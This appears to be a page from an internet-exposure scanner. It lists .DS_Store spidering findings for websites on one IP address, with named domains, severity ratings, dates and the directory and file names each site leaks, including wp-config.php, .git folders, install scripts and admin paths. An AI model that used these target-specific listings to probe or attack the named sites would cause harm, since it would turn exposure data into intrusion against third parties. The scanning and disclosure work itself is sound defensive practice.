Fingerprint: 5f32cf5d6962f09cc169dbbec169dbbeb528917e25902aaf5d00bdb5c2c1e2b6Found 15 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /storage /vendor
Found on 2024-08-30 16:05 -
Severity: low
Fingerprint: 5f32cf5d6962f09c3af247253af247251dec61f970f3a6842d5ea24eb2f28027Found 9 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Http /config /public /resources /storage /vendor
Found on 2024-08-28 09:33 -
Severity: low
Fingerprint: 5f32cf5d6962f09cdafa5447dafa54477e9c741770974cf2312fc9a86ce8753cFound 18 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /resources/views /resources/views/admin /resources/views/front /storage /vendor
Found on 2024-08-14 03:40 -
Severity: low
Fingerprint: 5f32cf5d6962f09cec7f8772ec7f8772692eda2ae0770a4b788811a95d03453bFound 11 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Http /app/Http/Controllers /app/Http/Requests /config /public /resources /storage /vendor
Found on 2024-08-10 21:00 -
Severity: low
Fingerprint: 5f32cf5d6962f09c0f8dcf020f8dcf022cde107afb89857b45585b797b886794Found 24 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /resources/views /resources/views/admin /resources/views/admin/admin /resources/views/admin/include /resources/views/front /storage /storage/app /vendor /vendor/nikic /vendor/nikic/php-parser /vendor/nikic/php-parser/grammar
Found on 2024-08-05 01:46 -
Severity: low
Fingerprint: 5f32cf5d6962f09c47dfe71947dfe719e3814ae542659040cc07a8e2c152138aFound 16 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /resources/views /storage /vendor
Found on 2024-07-26 17:48 -
Severity: low
Fingerprint: 5f32cf5d6962f09c3838040e3838040e63c0c24ebce1d55f2bae9bc5f6c52a62Found 20 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /resources/views /resources/views/admin /resources/views/admin/admin /resources/views/admin/include /resources/views/front /storage /vendor
Found on 2024-07-20 22:33 -
Severity: low
Fingerprint: 5f32cf5d6962f09c2eda814e2eda814ec721680e6381ef3f67011c55e2ac33feFound 6 files trough .DS_Store spidering: /app /config /public /resources /storage /vendor
Found on 2024-07-12 00:48 -
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcb3f27bc0f1583bf9b622747351ac7f20Found 22 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /resources/views /resources/views/admin /resources/views/admin/admin /resources/views/admin/include /resources/views/front /storage /storage/app /vendor /vendor/nikic
Found on 2024-05-28 20:11 -
Severity: low
Fingerprint: 5f32cf5d6962f09cae99eea9ae99eea969d9d335f9934f705c12d53258a00b9eFound 23 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /resources/views /resources/views/admin /resources/views/admin/admin /resources/views/admin/include /resources/views/front /storage /storage/app /vendor /vendor/nikic /vendor/nikic/php-parser
Found on 2023-11-16 18:44
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: dinhome.hff.xrd.mybluehost.me
Port: 443
URL: https://dinhome.hff.xrd.mybluehost.meFirst seen 2024-06-27 17:27
Last seen 2024-09-16 07:09
Open for 80 days-
Severity: medium
Fingerprint: 5f32cf5d6962f09c70ba7b5770ba7b579a2bc1b00143b801d239c02f7e971367Found 54 files trough .DS_Store spidering: /_notes /images /images/company_images /images/images /index.html /Sunny Corn Temp /Sunny Corn Temp/images /sunny_corn /Wood_furniture_restoration_&_refurbishing /Wood_furniture_restoration_&_refurbishing/AC_RunActiveContent.js /Wood_furniture_restoration_&_refurbishing/Back-ground-Din-Home.gif /Wood_furniture_restoration_&_refurbishing/Buy_Coffee_Table.html /Wood_furniture_restoration_&_refurbishing/Choice-of-stains.gif /Wood_furniture_restoration_&_refurbishing/DIN-Home-Web-Hosting-Limited-Time-Offer.gif /Wood_furniture_restoration_&_refurbishing/DIN-HOME_Coffee_Table_Images.html /Wood_furniture_restoration_&_refurbishing/DIN.docx /Wood_furniture_restoration_&_refurbishing/dinhome ecotable picture 0.jpg /Wood_furniture_restoration_&_refurbishing/dinhome ecotable picture 01.jpg /Wood_furniture_restoration_&_refurbishing/dinhome ecotable picture 1.jpg /Wood_furniture_restoration_&_refurbishing/DINHOME-Logo.jpg /Wood_furniture_restoration_&_refurbishing/dinhome.jpg /Wood_furniture_restoration_&_refurbishing/ECO Bench Ottoman 2.4 /Wood_furniture_restoration_&_refurbishing/ECO Coffee Table 1.9 /Wood_furniture_restoration_&_refurbishing/ECO Coffee Table 2.4 /Wood_furniture_restoration_&_refurbishing/ECO Coffee Table Images.swf /Wood_furniture_restoration_&_refurbishing/Eco Friendly Table.jpg /Wood_furniture_restoration_&_refurbishing/ECO-Bench-Ottoman-2.4-image.gif /Wood_furniture_restoration_&_refurbishing/ECO-Bench-Ottoman-2.4.gif /Wood_furniture_restoration_&_refurbishing/Eco-Coffee-Table--Birch-Finish.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-1.9.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-1.9image.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-2.1.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-2.1image.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-2.4-image.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-2.4.gif /Wood_furniture_restoration_&_refurbishing/favicon.ico /Wood_furniture_restoration_&_refurbishing/index.css /Wood_furniture_restoration_&_refurbishing/index.html /Wood_furniture_restoration_&_refurbishing/Natural-Finish.gif /Wood_furniture_restoration_&_refurbishing/Natural_ECO_Coffee_Table.html /Wood_furniture_restoration_&_refurbishing/Pricing /Wood_furniture_restoration_&_refurbishing/Produits_Maison_DIN_Home_Products_Contact.html /Wood_furniture_restoration_&_refurbishing/Register and Start Selling /Wood_furniture_restoration_&_refurbishing/Scripts /Wood_furniture_restoration_&_refurbishing/sitemap.xml /Wood_furniture_restoration_&_refurbishing/SpryAssets /Wood_furniture_restoration_&_refurbishing/Stain_Color_for_Eco_Coffee_Table.html /Wood_furniture_restoration_&_refurbishing/Stained Finishing.psd /Wood_furniture_restoration_&_refurbishing/Stained-Finishing.gif /Wood_furniture_restoration_&_refurbishing/Stained_&_Varnished_Coffee Table.html /Wood_furniture_restoration_&_refurbishing/Tables Home Products and web hosting.jpg /Wood_furniture_restoration_&_refurbishing/Varnished-Birch-Coffee-Table-For-Protection.gif /Wood_furniture_restoration_&_refurbishing/Varnished-For-Protection.gif /Wood_furniture_restoration_&_refurbishing/Varnished_ECO_Coffee_Table.html
Found on 2024-09-16 07:09
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2023-02-21 18:39
Last seen 2024-09-16 07:04
Open for 572 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2024-09-16 07:04
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: www.sophie.austynandbrian.com
Port: 443
URL: https://www.sophie.austynandbrian.comFirst seen 2022-11-23 18:39
Last seen 2024-09-16 06:57
Open for 662 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2024-09-16 06:57
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: www.hazel.austynandbrian.com
Port: 443
URL: https://www.hazel.austynandbrian.comFirst seen 2022-09-23 17:37
Last seen 2024-09-16 06:20
Open for 723 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2024-09-16 06:20
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: cuir-panda-leather-ca.hff.xrd.mybluehost.me
Port: 443
URL: https://cuir-panda-leather-ca.hff.xrd.mybluehost.meFirst seen 2024-06-21 12:44
Last seen 2024-09-16 05:51
Open for 86 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c3af247253af24725f3770dac72d6be8680cd2528b6a63b98Found 9 files trough .DS_Store spidering: /Business Card Panda /cgi-bin /Francais /Francais/images /Francais/Photoshop /Francais/SpryAssets /images /Photoshop /SpryAssets
Found on 2024-09-16 05:51
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-12-31 18:54
Last seen 2024-09-16 05:43
Open for 624 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c2eda814e2eda814efa4e382f4ba6ab874f3a0e468067f85fFound 6 files trough .DS_Store spidering: /_notes /Din-Home_marketing_consultants /Din-Home_marketing_consultants/Photoshop /Din-Home_marketing_consultants/SpryAssets /images /SpryAssets
Found on 2024-09-16 05:43
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2023-01-19 18:48
Last seen 2024-09-16 05:42
Open for 605 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c3c1fc5e93c1fc5e9466051ac734856ccb5d31acf1720259eFound 5 files trough .DS_Store spidering: /asset /css /fonts /images /js
Found on 2024-09-16 05:42
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-12-19 18:58
Last seen 2024-09-16 05:41
Open for 636 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c3af247253af24725f3770dac72d6be8680cd2528b6a63b98Found 9 files trough .DS_Store spidering: /Business Card Panda /cgi-bin /Francais /Francais/images /Francais/Photoshop /Francais/SpryAssets /images /Photoshop /SpryAssets
Found on 2024-09-16 05:41
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: www.mspolotska.polotska.com
Port: 443
URL: https://www.mspolotska.polotska.comFirst seen 2023-02-21 18:39
Last seen 2024-09-16 04:32
Open for 572 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2024-09-16 04:32
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-11-15 18:48
Last seen 2024-09-16 04:07
Open for 670 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c3838040e3838040e63c0c24ebce1d55f2bae9bc5f6c52a62Found 20 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /resources/views /resources/views/admin /resources/views/admin/admin /resources/views/admin/include /resources/views/front /storage /vendor
Found on 2024-09-16 04:07 -
Severity: low
Fingerprint: 5f32cf5d6962f09c0f8dcf020f8dcf022cde107afb89857b45585b797b886794Found 24 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /resources/views /resources/views/admin /resources/views/admin/admin /resources/views/admin/include /resources/views/front /storage /storage/app /vendor /vendor/nikic /vendor/nikic/php-parser /vendor/nikic/php-parser/grammar
Found on 2024-09-04 13:05 -
Severity: low
Fingerprint: 5f32cf5d6962f09c47dfe71947dfe719e3814ae542659040cc07a8e2c152138aFound 16 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /resources/views /storage /vendor
Found on 2024-08-28 22:10 -
Severity: low
Fingerprint: 5f32cf5d6962f09cab28146bab28146bd709a4939e89f2aeca6749acb9c6f979Found 21 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /resources/views /resources/views/admin /resources/views/admin/admin /resources/views/admin/include /resources/views/front /storage /storage/app /vendor
Found on 2024-08-26 21:49 -
Severity: low
Fingerprint: 5f32cf5d6962f09cdafa5447dafa54477e9c741770974cf2312fc9a86ce8753cFound 18 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /resources/views /resources/views/admin /resources/views/front /storage /vendor
Found on 2024-08-24 19:45 -
Severity: low
Fingerprint: 5f32cf5d6962f09cc169dbbec169dbbeb528917e25902aaf5d00bdb5c2c1e2b6Found 15 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /storage /vendor
Found on 2024-08-18 13:11 -
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcb3f27bc0f1583bf9b622747351ac7f20Found 22 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /resources/views /resources/views/admin /resources/views/admin/admin /resources/views/admin/include /resources/views/front /storage /storage/app /vendor /vendor/nikic
Found on 2024-08-14 01:45 -
Severity: low
Fingerprint: 5f32cf5d6962f09cae99eea9ae99eea969d9d335f9934f705c12d53258a00b9eFound 23 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /resources/views /resources/views/admin /resources/views/admin/admin /resources/views/admin/include /resources/views/front /storage /storage/app /vendor /vendor/nikic /vendor/nikic/php-parser
Found on 2024-07-28 15:13 -
Severity: low
Fingerprint: 5f32cf5d6962f09cc169dbbec169dbbeb528917e25902aaf5d00bdb50db32b95Found 15 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /config /public /resources /resources/views /resources/views/admin /resources/views/admin/admin /resources/views/admin/include /resources/views/front /storage /vendor
Found on 2024-06-18 14:17 -
Severity: low
Fingerprint: 5f32cf5d6962f09c39aac35b39aac35b22ee27c3c0b24ffef617025c0b216be3Found 14 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /config /public /resources /storage /vendor
Found on 2022-11-15 18:48
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2023-01-20 18:52
Last seen 2024-09-16 02:25
Open for 604 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c4239b3d84239b3d83fa5bcae254fbb4f2bc97ef927c132d4Found 8 files trough .DS_Store spidering: /javascript /site.psd /site_index.jpg /site_projectlist.jpg /site_selectedproject.jpg /site_work.jpg /siteimages /type
Found on 2024-09-16 02:25
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: johnmunnelly-net.skylarktechteam.com
Port: 443
URL: https://johnmunnelly-net.skylarktechteam.comFirst seen 2022-09-28 17:49
Last seen 2024-09-16 02:20
Open for 718 days-
Severity: medium
Fingerprint: 5f32cf5d6962f09c99d3320899d33208e922b3c9809eb348743ca9dff4d57f56Found 44 files trough .DS_Store spidering: /_notes /about.html /archive template /blog-single.html /blog.html /contact.html /contact.php /css /Documentation /fonts /img /img/_notes /img/about_BU.jpg /img/comment-1.jpg /img/comment-2.jpg /img/comment-3.jpg /img/comment-4.jpg /img/favicon.png /img/logo-munnely-.jpg /img/logo.png /img/logo_.png /img/munnelly_logo.jpg /img/post-1.jpg /img/post-2.jpg /img/post-3.jpg /img/post-4.jpg /img/post-5.jpg /img/post-6.jpg /img/skills_BU.jpg /img/Thumbs.db /img/work-1_BU.jpg /img/work-2_BU.jpg /img/work-3_BU.jpg /img/work-4.jpg /img/work-5.jpg /img/work-6.jpg /img/work-7.jpg /img/work-8.jpg /img/work-9.jpg /index.html /js /works-single.html /works.html /writing.html
Found on 2024-09-16 02:20
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-10-20 18:18
Last seen 2024-09-16 01:59
Open for 696 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c2eda814e2eda814efa4e382f4ba6ab874f3a0e468067f85fFound 6 files trough .DS_Store spidering: /_notes /Din-Home_marketing_consultants /Din-Home_marketing_consultants/Photoshop /Din-Home_marketing_consultants/SpryAssets /images /SpryAssets
Found on 2024-09-16 01:59
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-11-16 18:43
Last seen 2024-09-16 01:37
Open for 669 days-
Severity: medium
Fingerprint: 5f32cf5d6962f09cd4047824d40478241b871cc2a40ce067d868b186c56b30b4Found 35 files trough .DS_Store spidering: /.DS_Store /.git /.gitignore /.htaccess /authorize.php /CHANGELOG.txt /COPYRIGHT.txt /cron.php /includes /index.php /INSTALL.mysql.txt /INSTALL.pgsql.txt /install.php /INSTALL.sqlite.txt /INSTALL.txt /LICENSE.txt /MAINTAINERS.txt /misc /modules /profiles /README.txt /robots.txt /scripts /sites /sites/all /sites/all/libraries /sites/all/libraries/less.php /sites/default /sites/example.sites.php /sites/README.txt /themes /update.php /UPGRADE.txt /web.config /xmlrpc.php
Found on 2024-09-16 01:37 -
Severity: medium
Fingerprint: 5f32cf5d6962f09ca629b8b1a629b8b143a27af3538b923450299d7b7927ec8aFound 34 files trough .DS_Store spidering: /.DS_Store /.git /.gitignore /.htaccess /authorize.php /CHANGELOG.txt /COPYRIGHT.txt /cron.php /includes /index.php /INSTALL.mysql.txt /INSTALL.pgsql.txt /install.php /INSTALL.sqlite.txt /INSTALL.txt /LICENSE.txt /MAINTAINERS.txt /misc /modules /profiles /README.txt /robots.txt /scripts /sites /sites/all /sites/all/libraries /sites/default /sites/example.sites.php /sites/README.txt /themes /update.php /UPGRADE.txt /web.config /xmlrpc.php
Found on 2024-08-22 01:46 -
Severity: medium
Fingerprint: 5f32cf5d6962f09c2acf29aa2acf29aabe06c3b48ae79529658ffac091255406Found 33 files trough .DS_Store spidering: /.DS_Store /.git /.gitignore /.htaccess /authorize.php /CHANGELOG.txt /COPYRIGHT.txt /cron.php /includes /index.php /INSTALL.mysql.txt /INSTALL.pgsql.txt /install.php /INSTALL.sqlite.txt /INSTALL.txt /LICENSE.txt /MAINTAINERS.txt /misc /modules /profiles /README.txt /robots.txt /scripts /sites /sites/all /sites/default /sites/example.sites.php /sites/README.txt /themes /update.php /UPGRADE.txt /web.config /xmlrpc.php
Found on 2024-06-04 13:29 -
Severity: low
Fingerprint: 5f32cf5d6962f09cf35cbfb3f35cbfb391cb3501500dced2dac33721c3fa9fc9Found 29 files trough .DS_Store spidering: /.DS_Store /.git /.gitignore /.htaccess /authorize.php /CHANGELOG.txt /COPYRIGHT.txt /cron.php /includes /index.php /INSTALL.mysql.txt /INSTALL.pgsql.txt /install.php /INSTALL.sqlite.txt /INSTALL.txt /LICENSE.txt /MAINTAINERS.txt /misc /modules /profiles /README.txt /robots.txt /scripts /sites /themes /update.php /UPGRADE.txt /web.config /xmlrpc.php
Found on 2024-05-08 20:57
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-12-20 18:42
Last seen 2024-09-16 00:27
Open for 635 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c7cf176427cf17642f59365a3875f972d875f972d875f972dFound 2 files trough .DS_Store spidering: /images /images/Kickstarter_pre_order
Found on 2024-09-16 00:27
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: www.eliot.austynandbrian.com
Port: 443
URL: https://www.eliot.austynandbrian.comFirst seen 2022-09-25 17:36
Last seen 2024-09-16 00:27
Open for 721 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2024-09-16 00:27
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: www.website-cddaef1b.violetmemoire.com
Port: 80
URL: http://www.website-cddaef1b.violetmemoire.comFirst seen 2024-08-14 23:50
Last seen 2024-09-14 19:51
Open for 30 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c7cf176427cf17642b4ffba1cabd14320abd14320abd14320Found 2 files trough .DS_Store spidering: /wp-content /wp-includes
Found on 2024-09-14 19:51
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-09-15 17:38
Last seen 2024-09-14 07:48
Open for 729 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c39aac35b39aac35b22ee27c3c0b24ffef617025c0b216be3Found 14 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /config /public /resources /storage /vendor
Found on 2024-09-14 07:48 -
Severity: low
Fingerprint: 5f32cf5d6962f09c2eda814e2eda814ec721680e6381ef3f67011c55e2ac33feFound 6 files trough .DS_Store spidering: /app /config /public /resources /storage /vendor
Found on 2024-09-08 07:36 -
Severity: low
Fingerprint: 5f32cf5d6962f09c8329733f8329733fad82b89f858ea44a282594c078c97bdeFound 10 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /config /public /resources /storage /vendor
Found on 2024-09-04 09:05 -
Severity: low
Fingerprint: 5f32cf5d6962f09cec7f8772ec7f8772692eda2a46489afb9c8a8871b1c20f5eFound 11 files trough .DS_Store spidering: /app /config /public /resources /resources/views /resources/views/admin /resources/views/admin/admin /resources/views/admin/include /resources/views/front /storage /vendor
Found on 2024-09-02 09:47 -
Severity: low
Fingerprint: 5f32cf5d6962f09cc169dbbec169dbbeb528917e25902aaf5d00bdb5c2c1e2b6Found 15 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /storage /vendor
Found on 2024-09-01 07:37 -
Severity: low
Fingerprint: 5f32cf5d6962f09cccdd54a0ccdd54a01a619ebcabab5f858f67bfe7153b3243Found 13 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /config /public /resources /storage /vendor
Found on 2024-08-28 02:04 -
Severity: low
Fingerprint: 5f32cf5d6962f09c11d3744d11d3744d7da9d3d1721513ecb65012164009fb37Found 12 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Requests /config /public /resources /storage /vendor
Found on 2024-08-22 21:26 -
Severity: low
